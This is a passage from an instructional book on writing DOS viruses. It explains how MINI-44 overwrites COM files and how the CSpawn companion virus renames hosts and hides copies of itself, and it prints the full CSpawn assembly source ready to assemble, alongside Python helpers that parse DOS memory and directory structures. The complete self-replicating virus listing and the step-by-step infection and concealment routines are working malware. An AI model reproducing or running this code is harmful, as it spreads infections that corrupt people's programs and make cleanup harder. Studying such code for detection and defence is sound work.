2750:00C0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
2750:00D0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
2750:00E0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
2750:00F0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
At 80H we find the value 0EH, which is the length of the command tail " Hello there! " (the leading and trailing spaces are counted), followed by the string itself, terminated by <CR>=0DH. Likewise, the PSP contains the address of the system environment, which contains all of the "set" variables contained in AUTOEXEC.BAT, as well as the path which DOS searches for executables when you type a name at the command prompt. This path is a nice variable for a virus to get a hold of, since it tells the virus where to find lots of juicy programs to infect.
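To make the layout concrete, here is a small Python sketch that picks the command tail and the environment segment out of a PSP image. It is only an illustration: the helper names are invented for this example, and the two rows of bytes are copied from offsets 20H and 80H of the dump above, with the rest of the 256-byte image left as zeros.

```python
def command_tail(psp: bytes) -> str:
    """Return the command tail stored at PSP:80H (length byte, then text)."""
    length = psp[0x80]
    tail = psp[0x81:0x81 + length]
    # The byte following the tail should be the carriage return terminator.
    if psp[0x81 + length] != 0x0D:
        raise ValueError("command tail is not terminated by 0DH")
    return tail.decode("ascii")


def environment_segment(psp: bytes) -> int:
    """Return the 16-bit environment segment stored little-endian at PSP:2CH."""
    return int.from_bytes(psp[0x2C:0x2E], "little")


# Rebuild just the two interesting rows of the dump shown above.
psp = bytearray(256)
psp[0x20:0x30] = bytes.fromhex("FF FF FF FF FF FF FF FF FF FF FF FF 32 27 4C 01")
psp[0x80:0x90] = bytes.fromhex("0E 20 48 65 6C 6C 6F 20 74 68 65 72 65 21 20 0D")

print(repr(command_tail(bytes(psp))))          # ' Hello there! '
print(f"{environment_segment(bytes(psp)):04X}H")  # 2732H
```

Note that the tail comes back with its leading and trailing spaces intact, which is why the length byte is 0EH rather than 0CH.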
The final step which DOS must take before actually executing the COM file is to set up the stack. Typically the stack resides at the very top of the segment in which a COM program resides (See Figure 3.2). The first two bytes on the stack are always set up by DOS so that a simple RET instruction will terminate the COM program and return control to DOS. (This, too, is a relic from CP/M.) These bytes are set to zero to cause a jump to offset 0, where the int 20H instruction is stored in the PSP. The int 20H returns control to DOS. DOS then sets the stack pointer sp to FFFE Hex, and jumps to offset 100H, causing the requested COM program to execute.
OK, armed with this basic understanding of how a COM program works, let's go on to look at the simplest kind of virus.
Overwriting viruses are simple but mean viruses which have little respect for your programs. Once infected by an overwriting virus, the host program will no longer work properly because at least a portion of it has been replaced by the virus code - it has been overwritten - hence the name.
Fig. 3.2: Memory map just before executing a COM file.
This disrespect for program code makes programming an overwriting virus an easy task, though. In fact, some of the world's smallest viruses are overwriting viruses. Let's take a look at one, MINI-44.ASM, listed in Figure 3.3. This virus is a mere 44 bytes when assembled, but it will infect (and destroy) every COM file in your current directory if you run it.
This virus operates as follows:
As you can see, the end result is that every COM file in the current directory becomes infected, and the infected host program which was loaded executes the virus instead of the host.
The basic functions of searching for files and writing to files are widely used in many programs and many viruses, so let's dig into the MINI-44 a little more deeply to understand its search and infection mechanisms.
Fig. 3.3: The MINI-44 Virus Listing
To understand how a virus searches for new files to infect on an IBM PC style computer operating under DOS, it is important to understand how DOS stores files and information about them. All of the information about every file on disk is stored in two areas on disk, known as the directory and the File Allocation Table, or FAT for short. The directory contains a 32 byte file descriptor record for each file. (See Figure 3.4) This descriptor record contains the file's name and extent, its size, date and time of creation, and the file attribute, which contains essential information for the operating system about how to handle the file. The FAT is a map of the entire disk, which simply informs the operating system which areas are occupied by which files.
Each disk has two FAT's, which are identical copies of each other. The second is a backup, in case the first gets corrupted. On the other hand, a disk may have many directories. One directory, known as the root directory, is present on every disk, but the root may have multiple subdirectories, nested one inside of another to form a tree structure. These subdirectories can be created, used, and removed by the user at will. Thus, the tree structure can be as simple or as complex as the user has made it.
Fig. 3.4: The directory entry record.
Both the FAT and the root directory are located in a fixed area of the disk, reserved especially for them. Subdirectories are stored just like other files with the file attribute set to indicate that this file is a directory. The operating system then handles this subdirectory file in a completely different manner than other files to make it look like a directory, and not just another file. The subdirectory file simply consists of a sequence of 32 byte records describing the files in that directory. It may contain a 32 byte record with the attribute set to directory, which means that the file it refers to is a subdirectory of a subdirectory.
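As a rough illustration of what one of these 32 byte records holds, the Python sketch below unpacks a single directory entry. The field layout used here (8 byte name, 3 byte extent, attribute byte, 10 reserved bytes, time, date, starting cluster, size) is the standard FAT12/FAT16 layout and is an assumption on my part as to what Figure 3.4 depicts. The sample entries are made up for the example, not read from a real disk.

```python
import struct

# name(8) ext(3) attr(1) reserved(10) time(2) date(2) cluster(2) size(4) = 32 bytes
DIR_ENTRY = struct.Struct("<8s3sB10sHHHI")
ATTR_DIRECTORY = 0x10  # attribute bit that marks a subdirectory


def parse_dir_entry(record: bytes) -> dict:
    """Decode one 32-byte directory record into a small dictionary."""
    name, ext, attr, _reserved, time, date, cluster, size = DIR_ENTRY.unpack(record)
    base = name.decode("ascii").rstrip()
    extent = ext.decode("ascii").rstrip()
    return {
        "name": f"{base}.{extent}" if extent else base,
        "attribute": attr,
        "is_directory": bool(attr & ATTR_DIRECTORY),
        "first_cluster": cluster,
        "size": size,
    }


# Two hypothetical records: an ordinary file and a subdirectory.
file_rec = DIR_ENTRY.pack(b"HOST    ", b"COM", 0x20, bytes(10), 0, 0, 2, 210)
dir_rec = DIR_ENTRY.pack(b"SYSTEM  ", b"   ", 0x10, bytes(10), 0, 0, 5, 0)

print(parse_dir_entry(file_rec))
print(parse_dir_entry(dir_rec))
```

The only difference DOS cares about between the two records is the attribute bit, which is what lets a subdirectory be stored as just another file.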
The DOS operating system normally controls all access to files and subdirectories. If one wants to read or write to a file, he does not write a program that locates the correct directory on the disk, reads the file descriptor records to find the right one, figures out where the file is and reads it. Instead of doing all of this work, he simply gives DOS the directory and name of the file and asks it to open the file. DOS does all the grunt work. This saves a lot of time in writing and debugging programs. One simply does not have to deal with the intricate details of managing files and interfacing with the hardware.
DOS is told what to do using Interrupt Service Routines (ISR's). Interrupt 21H is the main DOS interrupt service routine that we will use. To call an ISR, one simply sets up the required CPU registers with whatever values the ISR needs to know what to do, and calls the interrupt. For example, the code
mov dx,OFFSET FNAME
xor al,al ;al=0
mov ah,3DH ;DOS function 3D
int 21H ;go do it
opens a file whose name is stored in the memory location FNAME in preparation for reading it into memory. This function tells DOS to locate the file and prepare it for reading. The int 21H instruction transfers control to DOS and lets it do its job. When DOS is finished opening the file, control returns to the statement immediately after the int 21H. The register ah contains the function number, which DOS uses to determine what you are asking it to do. The other registers must be set up differently, depending on what ah is, to convey more information to DOS about what it is supposed to do. In the above example, the ds:dx register pair is used to point to the memory location where the name of the file to open is stored. Setting the register al to zero tells DOS to open the file for reading only.
All of the various DOS functions, including how to set up all the registers, are detailed in many books on the subject. Ralf Brown and Jim Kyle's PC Interrupts is one of the better ones, so if you don't have that information readily available, I suggest you get a copy. Here we will only document the DOS functions we need, as we need them, in Appendix A. This will probably be enough to get by. However, if you are going to study viruses on your own, it is definitely worthwhile knowing about all of the various functions available, as well as the finer details of how they work and what to watch out for.
To search for other files to infect, the MINI-44 virus uses the DOS search functions. The people who wrote DOS knew that many programs (not just viruses) require the ability to look for files and operate on them if any of the required type are found. Thus, they incorporated a pair of searching functions into the Interrupt 21H handler, called Search First and Search Next. These are some of the more complicated DOS functions, so they require the user to do a fair amount of preparatory work before he calls them. The first step is to set up an ASCIIZ string in memory to specify the directory to search, and what files to search for. This is simply an array of bytes terminated by a null byte (0). DOS can search and report on either all the files in a directory or a subset of files which the user can specify by file attribute and by specifying a file name using the wildcard characters "?" and "*", which you should be familiar with from executing commands like copy *.* a: and dir a???_100.* from the command line in DOS. (If not, a basic book on DOS will explain this syntax.) For example, the ASCIIZ string
DB '\system\hyper.*',0
will set up the search function to search for all files with the name hyper, and any possible extent, in the subdirectory named system. DOS might find files like hyper.c, hyper.prn, hyper.exe, etc. If you don't specify a path in this string, but just a file name, e.g. "*.COM" then DOS will search the current directory.
After setting up this ASCIIZ string, one must set the registers ds and dx up to point to the segment and offset of this ASCIIZ string in memory. Register cl must be set to a file attribute mask which will tell DOS which file attributes to allow in the search, and which to exclude. The logic behind this attribute mask is somewhat complex, so you might want to study it in detail in Appendix A. Finally, to call the Search First function, one must set ah = 4E Hex.
If the Search First function is successful, it returns with the carry flag clear and register al = 0, and it formats 43 bytes of data in the Disk Transfer Area, or DTA. This data provides the program doing the search with the name of the file which DOS just found, its attribute, its size and its date of creation. Some of the data reported in the DTA is also used by DOS for performing the Search Next function. If the search cannot find a matching file, DOS returns with the carry flag set and al non-zero, with no data in the DTA. Since the calling program knows the address of the DTA, it can go examine that area for the file information after DOS has stored it there. When any program starts up, the DTA is by default located at offset 80H in the Program Segment Prefix. A program can subsequently move the DTA anywhere it likes by asking DOS, as we will discuss later. For now, though, the default DTA will work for MINI-44 just fine.
To see how the search function works more clearly, let us consider an example. Suppose we want to find all the files in the currently logged directory with an extent "COM", including hidden and system files. The assembly language code to do the Search First would look like this (assuming ds is already set up correctly, as it is for a COM file):
SRCH_FIRST:
mov dx,OFFSET COMFILE ;set offset of asciiz string
mov cl,00000110B ;attribute mask: include hidden and system files
mov ah,4EH ;search first function
int 21H ;call DOS
jc NOFILE ;go handle no file found condition
FOUND: ;come here if file found
COMFILE DB '*.COM',0
If this routine executed successfully, the DTA might look like this:
03 3F 3F 3F 3F 3F 3F 3F-3F 43 4F 4D 06 18 00 00  .????????COM....
00 00 00 00 00 00 16 98-30 13 BC 62 00 00 43 4F  ........0..b..CO
4D 4D 41 4E 44 2E 43 4F-4D 00 00 00 00 00 00 00  MMAND.COM.......
when the program reaches the label FOUND. In this case the search found the file COMMAND.COM.
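The dump is easier to read once it is split into fields. The Python sketch below does that for the bytes shown above, assuming the usual layout of the search data block: 21 bytes reserved for DOS's own use, then the attribute at offset 15H, time at 16H, date at 18H, size at 1AH, and the ASCIIZ file name at 1EH. The function name is made up for this example.

```python
import struct

# The 48 bytes of the DTA dump shown above (only the first 43 are meaningful).
DTA_DUMP = bytes.fromhex(
    "03 3F 3F 3F 3F 3F 3F 3F 3F 43 4F 4D 06 18 00 00 "
    "00 00 00 00 00 00 16 98 30 13 BC 62 00 00 43 4F "
    "4D 4D 41 4E 44 2E 43 4F 4D 00 00 00 00 00 00 00 "
)


def parse_search_dta(dta: bytes) -> dict:
    """Pull the documented fields out of a Search First/Next data block."""
    attribute = dta[0x15]
    # Little-endian: 16-bit time, 16-bit date, 32-bit size, starting at 16H.
    time, date, size = struct.unpack_from("<HHI", dta, 0x16)
    # The name is a zero-terminated string of at most 13 bytes at 1EH.
    name = dta[0x1E:0x1E + 13].split(b"\0")[0].decode("ascii")
    return {"attribute": attribute, "time": time, "date": date,
            "size": size, "name": name}


info = parse_search_dta(DTA_DUMP)
print(info["name"], info["size"])   # COMMAND.COM 25276
```

Since the default DTA sits at offset 80H in the PSP, the file name field at 1EH ends up at offset 9EH in the program's segment.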
In comparison with the Search First function, the Search Next is easy, because all of the data has already been set up by the Search First. Just set ah = 4F hex and call DOS interrupt 21H:
mov ah,4FH ;search next function
int 21H ;call DOS
jc NOFILE ;no, go handle no file found
FOUND2: ;else process the file
If another file is found, the data in the DTA will be updated with the new file name, and DOS will return with the carry flag clear. If no more matches are found, DOS will set the carry flag on return. One must be careful here so the data in the DTA is not altered between the call to Search First and later calls to Search Next, because the Search Next expects the data from the last search call to be there.
The MINI-44 virus puts the DOS Search First and Search Next functions together to find every COM program in a directory, using the simple logic of Figure 3.5.
The obvious result is that MINI-44 will infect every COM file in the directory you're in as soon as you execute it. Simple enough.
Fig 3.5: MINI-44 file search logic.
MINI-44's replication mechanism is even simpler than its search mechanism. To replicate, it simply opens the host program in write mode - just like an ordinary program would open a data file - and then it writes a copy of itself to that file, and closes it. Opening and closing are essential parts of writing a file in DOS. The act of opening a file is like getting permission from DOS to touch that file. When DOS returns the OK to your program, it is telling you that it does indeed have the resources to access that file, that the file exists in the form you expect, etc. Closing the file tells DOS to finish up work on the file and flush all data changes from DOS' memory buffers and put it on the disk.
To open the host program, MINI-44 uses DOS Interrupt 21H Function 3D Hex. The access rights in the al register are specified as 1 for write-only access (since the virus doesn't need to inspect the program it is infecting). The ds:dx pair must point to the file name, which has already been set up in the DTA by the search functions at FNAME = 9EH.
The code to open the file is thus given by:
mov ax,3D01H
mov dx,OFFSET FNAME
int 21H
If DOS is successful in opening the file, it will return a file handle in the ax register. This file handle is simply a 16-bit number that uniquely references the file just opened. Since all other DOS file manipulation calls require this file handle to be passed to them in the bx register, MINI-44 puts it there as soon as the file is opened with a mov bx,ax instruction.
Next, the virus writes a copy of itself into the host program file using Interrupt 21H, Function 40H. To do this, ds:dx must be set up to point to the data to be written to the file, which is the virus itself, located at ds:100H. (ds was already set up properly when the COM program was loaded by DOS.) At this point, the virus which is presently executing is treating itself just like any ordinary data to be written to a file - and there's no reason it can't do that. Next, to call function 40H, cx should be set up with the number of bytes to be written to the disk, in this case 44, dx should point to the data to be written (the virus), and bx should contain the file handle:
mov bx,ax ;put file handle in bx
mov dx,100H ;location to write from
mov cx,44 ;bytes to write
mov ah,40H
int 21H ;do it
Finally, to close the host file, MINI-44 simply uses DOS function 3EH, with the file handle in bx once again. Figure 3.6 depicts the end result of such an infection.
| Uninfected | Infected |
|---|---|
| Original COM File Code | Original COM File Code |
| Original COM File Code | Original COM File Code |
| Original COM File Code | Original COM File Code |
| Original COM File Code | Original COM File Code |
| Original COM File Code | Original COM File Code |
| Original COM File Code | MINI-44 Virus Code |
Fig. 3.6: Uninfected and infected COM files.
MINI-44 is an incredibly simple virus as far as viruses go. If you're a novice at assembly language, it's probably just enough to cut your teeth on without being overwhelmed. If you're a veteran assembly language programmer who hasn't thought too much about viruses, you've just learned how ridiculously easy it is to write a virus.
Of course, MINI-44 isn't a very good virus. Since it destroys everything it touches, all you have to do is run one program to know you're infected. And the only thing to do once you're infected is to delete all the infected files and replace them from a backup. In short, this isn't the kind of virus that stands a chance of escaping into the wild and showing up on computers where it doesn't belong without any help.
In general, overwriting viruses aren't very good at establishing a population in the wild because they are so easy to spot, and because they're blatantly destructive and disagreeable. The only way an overwriting virus has a chance at surviving on a computer for more than a short period of time is to employ a sophisticated search mechanism so that when you execute it, it jumps to some far off program in another directory where you can't find it. And if you can't find it, you can't clean it up. There are indeed overwriting viruses which use this strategy. Of course, even this strategy is of little use once your scanner can detect it, and if you're going to make the virus hard to scan, you may as well make a better virus while you're at it.
Companion viruses are the next step up in complexity after overwriting viruses. They are the simplest non-destructive type of virus in the IBM PC environment.
A companion virus is a program which fools the computer operator by renaming programs on a disk to non-standard names, and then replacing the standard program names with itself. Figure 4.1 shows how a companion virus infects a directory. In Figure 4.1a, you can see the directory with the uninfected host, HOST1.COM. In Figure 4.1b you see the directory after an infection. HOST1.COM has been renamed HOST1.CON, and the virus lives in the hidden file HOST1.COM. If you type "HOST1" at the DOS prompt, the virus executes first, and passes control to the host, HOST1.CON, when it is ready.
Let's look into the non-resident companion virus called CSpawn to see just how such a virus goes about its business...
There are two very important things a companion virus must accomplish: It must be capable of spreading or infecting other files, and it must be able to transfer control to a host program which is what the user thought he was executing when he typed a program name at the command prompt.
Directory of C:\VIRTEST
Name Ext Size #Clu Date Time Attributes
HOST1 COM 210 1 4/19/94 9:13p Normal,Archive
HOST5 COM 1984 1 4/19/94 9:13p Normal,Archive
HOST6 COM 501 1 4/19/94 9:13p Normal,Archive
HOST7 COM 4306 1 4/19/94 9:13p Normal,Archive
Fig. 4.1a: Directory with uninfected HOST1.COM.
Directory of C:\VIRUTEST Virus
|
Name Ext Size #Clu Date Time Attributes |
HOST1 COM 180 1 10/31/94 9:54a Hidden,Archive <--+
HOST5 COM 180 1 10/31/94 9:54a Hidden,Archive <--+
HOST1 CON 210 1 4/19/94 9:13p Normal,Archive |
HOST6 COM 180 1 10/31/94 9:54a Hidden,Archive <--+
HOST7 COM 180 1 10/31/94 9:54a Hidden,Archive <--+
HOST5 CON 1984 1 4/19/94 9:13p Normal,Archive
HOST6 CON 501 1 4/19/94 9:13p Normal,Archive
HOST7 CON 4306 1 4/19/94 9:13p Normal,Archive
Fig. 4.1b: Directory with infected HOST1.COM.
Before CSpawn infects other programs, it executes the host program which it has attached itself to. This host program exists as a separate file on disk, and the copy of the CSpawn virus which has attached itself to this host has a copy of its (new) name stored in it.
Before executing the host, CSpawn must reduce the amount of memory it takes for itself. First the stack must be moved. In a COM program the stack is always initialized to be at the top of the code segment, which means the program takes up 64 kilobytes of memory, even if it's only a few hundred bytes long. For all intents and purposes, CSpawn only needs a few hundred bytes for stack, so it is safe to move it down to just above the end of the code. This is accomplished by changing sp,
mov sp,OFFSET FINISH + 100H
Next, CSpawn must tell DOS to release the unneeded memory with Interrupt 21H, Function 4AH, putting the number of paragraphs (16 byte blocks) of memory to keep in the bx register:
mov ah,4AH
mov bx,(OFFSET FINISH)/16 + 11H
int 21H
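The constant 11H in that expression is worth a second look. The Python sketch below works through the arithmetic under two assumptions: that OFFSET FINISH is measured from the start of the segment (so it already includes the 100H bytes of the PSP, as in a program assembled with ORG 100H), and that 100H bytes are set aside for the relocated stack, as in the mov sp instruction above. The function name and the sample value of FINISH are hypothetical.

```python
PARAGRAPH = 16  # DOS allocates memory in 16-byte paragraphs


def paragraphs_to_keep(finish_offset: int, stack_bytes: int = 0x100) -> int:
    """Paragraphs needed to hold everything up to FINISH plus the new stack."""
    # FINISH/16 rounds down, so one extra paragraph is added to cover the
    # remainder; 100H bytes of stack is another 10H paragraphs. Together
    # that is the FINISH/16 + 11H used in the text.
    return finish_offset // PARAGRAPH + stack_bytes // PARAGRAPH + 1


finish = 0x1B4  # hypothetical value of OFFSET FINISH
kept = paragraphs_to_keep(finish)
print(f"{kept:X}H paragraphs = {kept * PARAGRAPH} bytes")
print(f"needed: {finish + 0x100} bytes")
```

With these numbers the block kept is 2CH paragraphs (704 bytes), comfortably covering the 692 bytes that the code, data and new stack occupy.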
Once memory is released, the virus is free to execute the host using the DOS Interrupt 21H, Function 4BH EXEC command. To call this function properly, ds:dx must be set up to point to the name of the file to execute (stored in the virus in the variable SPAWN_NAME), and es:bx must point to a block of parameters to tell DOS where variables like the command line and the environment string are located. This parameter block is illustrated in Figure 4.2, along with detailed descriptions of what all the fields in it mean. Finally, the al register should be set to zero to tell DOS to load and execute the program. (Other values let DOS just load, but not execute, etc. See Appendix A.) The code to do all this is pretty simple:
mov dx,OFFSET SPAWN_NAME
mov bx,OFFSET PARAM_BLK
mov ax,4B00H
int 21H
There! DOS loads and executes the host without any further fuss, returning control to the virus when it's done. Of course, in the process of executing, the host will mash most of the registers, including the stack and segment registers, so the virus must clean things up a bit before it does anything else.
| Offset | Size(bytes) | Description |
|---|---|---|
| 0 | 2 | Segment of environment string. This is usually stored at offset 2CH in the PSP of the calling program, though the program calling EXEC can change it. |
| 2 | 4 | Pointer to command line (typically at offset 80H in the PSP of the calling program, PSP:80H) |
| 6 | 4 | Pointer to first default FCB (typically at offset 5CH in the PSP, PSP:5CH) |
| 10 | 4 | Pointer to second FCB (typically at offset 6CH in the PSP, PSP:6CH) |
| 14 | 4 | Initial ss:sp of loaded program (subfunctions 1 and 3, returned by DOS) |
| 18 | 4 | Initial cs:ip of loaded program (subfunctions 1 and 3, returned by DOS) |
Fig 4.2: EXEC function control block.
Our companion virus searches for files to infect in the same way MINI-44 does, using the DOS Search First and Search Next functions, Interrupt 21H, Functions 4EH and 4FH. CSpawn is designed to infect every COM program file it can find in the current directory as soon as it is executed. The search process itself follows the same logic as MINI-44 in Figure 3.5.
The search routine looks like this now:
mov dx,OFFSET COM_MASK
mov ah,4EH ;search first
xor cx,cx ;normal files only
SLOOP: int 21H ;do search
jc SDONE ;none found, exit
call INFECT_FILE ;one found, infect it
mov ah,4FH ;search next fctn
jmp SLOOP ;do it again
SDONE:
Notice that we have a call to a separate infection procedure now, since the infection process is more complex.
There is one further step which CSpawn must take to work properly. The DOS search functions use 43 bytes in the Disk Transfer Area (DTA) as discussed in the last chapter. Where is this DTA though?
When DOS starts a program, it sets the DTA up at ds:0080H, but the program can move it when it executes by using the DOS Interrupt 21H Function 1AH. Because the host program has already executed, DOS has moved the DTA to the host's data segment, and the host may have moved it somewhere else on top of that. So before performing a search, CSpawn must restore the DTA. This is easily accomplished with Function 1AH, setting ds:dx to the address where you'd like the DTA to be. The default location ds:0080H will do just fine here:
mov ah,1AH
mov dx,80H
int 21H
Note that if CSpawn had done its searching and infecting before the host was executed, it would not be a wise idea to leave the DTA at offset 80H. That's because the command line parameters are stored in the same location, and the search would wipe those parameters out. For example, if you had a disk copying program called MCOPY, which was invoked with a command like this:
C:\>MCOPY A: B:
to indicate copying from A: to B:, the search would wipe out the "A: B:" and leave MCOPY clueless as to where to copy from and to. In such a situation, another area of memory would have to be reserved, and the DTA would have to be moved to that location from the default value. All one would have to do in this situation would be to define
DTA DB 43 dup (?)
and then set it up with
mov ah,1AH
mov dx,OFFSET DTA
int 21H
Note that it was perfectly all right for MINI-44 to use the default DTA because it destroyed the program it infected. As such it mattered but little that the parameters passed to the program were also destroyed. Not so for a virus that doesn't destroy the host.
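For readers who want to see what the 43 bytes in the DTA hold, here is a minimal Python sketch that decodes such a record. The name at offset 1EH and the size at offset 1AH are used in this book; the attribute, time and date offsets are taken from the standard DOS documentation rather than from this chapter, and the function name is hypothetical.

```python
import struct

DTA_SIZE = 43  # bytes used by the DOS search functions


def parse_search_record(dta):
    """Decode the documented fields of a 43-byte search record."""
    if len(dta) < DTA_SIZE:
        raise ValueError("search record must be at least 43 bytes")
    attribute = dta[0x15]                       # file attribute byte
    time_word, date_word, size = struct.unpack_from("<HHI", dta, 0x16)
    raw_name = dta[0x1E:0x1E + 13]              # ASCIIZ name, 8.3 plus the null
    name = raw_name.split(b"\x00", 1)[0].decode("ascii")
    return {
        "attribute": attribute,
        "time": time_word,
        "date": date_word,
        "size": size,
        "name": name,
    }
```

With the DTA at its default offset 80H, the file name therefore starts at 80H + 1EH = 9EH.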
Once CSpawn has found a file to infect, the process of infection is fairly simple. To infect a program, CSpawn renames the host and then creates a copy of itself under the host's original name.
In this way, the next time the name of the host is typed on the command line, the virus will be executed instead.
To rename the host, the virus copies its name from the DTA, where the search routine put it, to a buffer called SPAWN_NAME. Then CSpawn changes the name in this buffer by changing the last letter to an "N". Next, CSpawn calls the DOS Rename function, Interrupt 21H, Function 56H. To use this function, ds:dx must point to the original name (in the DTA) and es:di must point to the new name (in SPAWN_NAME):
mov dx,9EH ;DTA + 1EH, original name
mov di,OFFSET SPAWN_NAME
mov ah,56H
int 21H
Finally, the virus creates a file with the original name of the host,
mov ah,3CH ;DOS file create function
mov cx,3 ;hidden, read only attributes
mov dx,9EH ;DTA + 1EH, original name
int 21H
and writes a copy of itself to this file
mov ah,40H ;DOS file write fctn
mov cx,FINISH-CSpawn ;size of virus
mov dx,100H ;location of virus
int 21H
Notice that when CSpawn creates the file, it sets the hidden attribute on the file. There are two reasons to do that. First, it makes disinfecting CSpawn harder. You won't see the viral files when you do a directory and you can't just delete them - you'll need a special utility like PC Tools or Norton Utilities. Secondly, it keeps CSpawn from infecting itself. Suppose CSpawn had infected the program FORMAT. Then there would be two files on disk, FORMAT.CON, the original, and FORMAT.COM, the virus. But the next time the virus executes, what is to prevent it from finding FORMAT.COM and at least trying to infect it again? If FORMAT.COM is hidden, the virus' own search mechanism will skip it since we did not ask it to search for hidden files. Thus, hiding the file prevents reinfection.
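The attribute filtering described here can be modelled in a few lines of Python. This is a simplified sketch of how the DOS search functions treat the attribute mask, not a full emulation: it ignores the special handling of volume labels, and the function name is hypothetical. The bit values themselves are the standard DOS attribute bits.

```python
READ_ONLY, HIDDEN, SYSTEM = 0x01, 0x02, 0x04
VOLUME_LABEL, DIRECTORY, ARCHIVE = 0x08, 0x10, 0x20


def search_returns(file_attr, search_attr):
    """Simplified model of the attribute filter in Search First/Search Next.

    Hidden, system and directory entries are reported only when the matching
    bit is set in the search attribute; read-only and archive bits are ignored.
    """
    special = HIDDEN | SYSTEM | DIRECTORY
    return (file_attr & special & ~search_attr) == 0
```

In this model a search with cx=0 reports ordinary files but skips any file that carries the hidden bit, whether the file was created with attribute 2 (hidden) or 3 (hidden and read-only).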
There are a wide variety of strategies possible in writing companion viruses, and most of them have been explored by virus writers in one form or another. The CSpawn virus works like a virus generated by the Virus Creation Lab (VCL), a popular underground program which uses a pull-down menu system to automatically generate viruses. CSpawn lacks only some of the unnecessary and confusing code generated by the VCL. Yet there are many other possibilities...
Some of the first companion viruses worked on the principle that when a user enters a program name at the command prompt, DOS always searches for a COM program first and then an EXE. Thus, a companion virus can search for EXE program files and simply create a COM file with the same name, only hidden, in the same directory. Then, whenever a user types a name, say FDISK, the FDISK.COM virus program will be run by DOS. It will replicate and execute the host FDISK.EXE. This strategy makes for an even simpler virus than CSpawn.
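The search order mentioned above can be sketched as a toy model in Python. It assumes a single directory and ignores the PATH and internal commands; the BAT entry is the usual third step in the DOS order and is not discussed in this chapter. The function name is hypothetical.

```python
def resolve_command(typed_name, directory_files):
    """Pick the file DOS would run for a name typed without an extension."""
    extension_order = ("COM", "EXE", "BAT")  # COM is tried before EXE
    available = {name.upper() for name in directory_files}
    for ext in extension_order:
        candidate = f"{typed_name.upper()}.{ext}"
        if candidate in available:
            return candidate
    return None
```

Given a directory that holds both FDISK.COM and FDISK.EXE, the model returns FDISK.COM, which is the behavior this class of companion program depends on, and also what a user checking a suspicious directory should look for.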
Yet there need not be any relationship between the name of the virus executable and the host it executes. In fact, DOS Interrupt 21H, Function 5AH will create a file with a completely random name. The host can be renamed to that, hidden, and the virus can assume the host's original name. Since the DOS File Rename function can actually change the directory of the host while renaming it, the virus could also collect up all the hosts in one directory, say \WINDOWS\TMP, where a lot of random file names would be expected. (And pity the poor user who decides to delete all those "temporary" files.)
Neither must one use the DOS EXEC function to load a file. One could, for example, use DOS Function 26H to create a program segment, and then load the program with a file read.
Finally, one should note that a companion virus written as a COM file can easily attack EXE files too. If the virus is written as a COM file, then even if it creates a copy of itself named EXE, DOS will interpret that EXE as a COM file and execute it properly. The virus itself can EXEC an EXE host file just as easily as a COM file because the DOS EXEC function does all the dirty work of interpreting the different formats.
The major problem a companion virus that infects EXEs will run into is Windows executables, which it must stay away from. It will cause Windows all kinds of problems if it does not. We will discuss Windows executables more thoroughly in a few chapters when we begin looking at EXE files in depth.
The following virus can be assembled into a COM file by MASM, TASM or A86 and executed directly.
;The CSpawn virus is a simple companion virus to illustrate how a companion
;virus works.
;
;(C) 1994 American Eagle Publications, Inc. All Rights Reserved!
.model tiny
.code
org 0100h
CSpawn:
mov sp, OFFSET FINISH + 100H ;Change top of stack
mov ah, 4AH ;DOS resize memory fctn
mov bx, sp
mov cl, 4
shr bx, cl
inc bx ;BX=# of para to keep
int 21H
mov bx, 2CH ;set up EXEC param block
mov ax, [bx]
mov WORD PTR [PARAM_BLK], ax ;environment segment
mov ax, cs
mov WORD PTR [PARAM_BLK+4], ax ;@ of parameter string
mov WORD PTR [PARAM_BLK+8], ax ;@ of FCB1
mov WORD PTR [PARAM_BLK+12], ax ;@ of FCB2
mov dx, OFFSET REAL_NAME ;prep to EXEC
mov bx,OFFSET PARAM_BLK
mov ax,4B00H
int 21H ;execute host
cli
mov bx,ax ;save return code here
mov ax,cs ;AX holds code segment
mov ss,ax ;restore stack first
mov sp,(FINISH - CSpawn) + 200H
sti
push bx
mov ds,ax ;Restore data segment
mov es,ax ;Restore extra segment
mov ah,1AH ;DOS set DTA function
mov dx,80H ;put DTA at offset 80H
int 21H
call FIND_FILES ;Find and infect files
pop ax ;AL holds return value
mov ah,4CH ;DOS terminate function
int 21H ;bye-bye
;The following routine searches for COM files and infects them
FIND_FILES:
mov dx,OFFSET COM_MASK ;search for COM files
mov ah,4EH ;DOS find first file function
xor cx,cx ;CX=0: match normal files only
FIND_LOOP: int 21H
jc FIND_DONE ;Exit if no files found
call INFECT_FILE ;Infect the file!
mov ah,4FH ;DOS find next file function
jmp FIND_LOOP ;Try finding another file
FIND_DONE: ret ;Return to caller
COM_MASK db '*.COM',0 ;COM file search mask
;This routine infects the file specified in the DTA.
INFECT_FILE:
mov si,9EH ;DTA + 1EH
mov di,OFFSET REAL_NAME ;DI points to new name
INF_LOOP: lodsb ;Load a character
stosb ;and save it in buffer
or al,al ;Is it a NULL?
jnz INF_LOOP ;If not, copy the next character
mov WORD PTR [di-2],'N' ;change name to CON & add 0
mov dx,9EH ;DTA + 1EH
mov di,OFFSET REAL_NAME
mov ah,56H ;rename original file
int 21H
jc INF_EXIT ;if can't rename, already done
mov ah,3CH ;DOS create file function
mov cx,2 ;set hidden attribute
int 21H
mov bx,ax ;BX holds file handle
mov ah,40H ;DOS write to file function
mov cx,FINISH - CSpawn ;CX holds virus length
mov dx,OFFSET CSpawn ;DX points to start of virus
int 21H
mov ah,3EH ;DOS close file function
int 21H
INF_EXIT: ret
REAL_NAME db 13 dup (?) ;Name of host to execute
;DOS EXEC function parameter block
PARAM_BLK DW ? ;environment segment
DD 80H ;@ of command line
DD 5CH ;@ of first FCB
DD 6CH ;@ of second FCB
FINISH:
end CSpawn
The next five exercises will lead the reader through the necessary steps to create a beneficial companion virus which secures all the programs in a directory with a password without which they cannot be executed. While this virus doesn't provide world-class security, it will keep the average user from nosing around where he doesn't belong.
Now we are ready to discuss COM infecting viruses that actually attach themselves to an existing COM file in a non-destructive manner. This type of virus, known as a parasitic virus, has the advantage that it does not destroy the program it attacks, and it does not leave tell-tale signs like all kinds of new hidden files and renamed files. Instead, it simply inserts itself into the existing program file of its chosen host. The only thing you'll notice when a program gets infected is that the host file has grown a bit, and it has a new date stamp.
